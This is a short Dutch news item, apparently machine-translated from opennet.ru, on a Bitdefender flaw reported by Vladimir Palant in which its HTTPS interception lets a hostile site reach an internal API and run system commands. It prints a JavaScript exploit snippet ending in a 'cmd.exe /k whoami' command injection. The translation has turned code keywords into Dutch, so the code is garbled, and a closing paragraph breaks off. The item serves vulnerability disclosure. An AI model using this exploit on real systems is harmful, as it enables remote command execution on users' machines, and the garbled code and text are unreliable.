Vladimir Palant, maker van Adblock Plus,
De reden voor het probleem is dat Bitdefender-antivirus lokaal HTTPS-verkeer onderschept door het originele TLS-certificaat van de site te vervangen. Op het clientsysteem wordt een extra rootcertificaat geïnstalleerd, waarmee u de werking van het gebruikte verkeersinspectiesysteem kunt verbergen. Het antivirusprogramma wringt zich in het beveiligde verkeer en vervangt op sommige pagina's zijn eigen JavaScript-code om de Safe Search-functie te implementeren, en in geval van problemen met het beveiligde verbindingscertificaat vervangt het de foutpagina door zijn eigen code. Aangezien de nieuwe foutpagina wordt uitgegeven namens de server die wordt geopend, hebben andere pagina's op die server volledige toegang tot de inhoud die door Bitdefender is ingevoegd.
Wanneer een door een aanvaller gecontroleerde site wordt geopend, kan die site een XMLHttpRequest verzenden en als reactie een HTTPS-certificaatprobleem veinzen, wat een door Bitdefender vervalste foutpagina zal retourneren. Aangezien de foutpagina wordt geopend in de context van het domein van de aanvaller, kan de aanvaller de inhoud van de vervalste Bitdefender-instellingenpagina lezen. De door Bitdefender vervangen pagina bevat ook een sessiesleutel waarmee de interne Bitdefender-API kan worden gebruikt om een afzonderlijke Safepay-browsersessie te starten, willekeurige commandoregelvlaggen te specificeren, en de lancering van alle systeemcommando's te bereiken met behulp van de "-utility-cmd-prefix"-vlag . Exploitvoorbeeld (param1 en param2 zijn de waarden verkregen van de foutpagina):
var request = nieuwe XMLHttpRequest();
verzoek.open("POST", Math.willekeurig());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Houd er rekening mee dat een studie uit 2017
Slechts 11 van de 26 producten leverden up-to-date coderingssuites. 5 systemen voerden geen certificaatverificatie uit (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security en Total Security-producten werden aangevallen
Bron: opennet.ru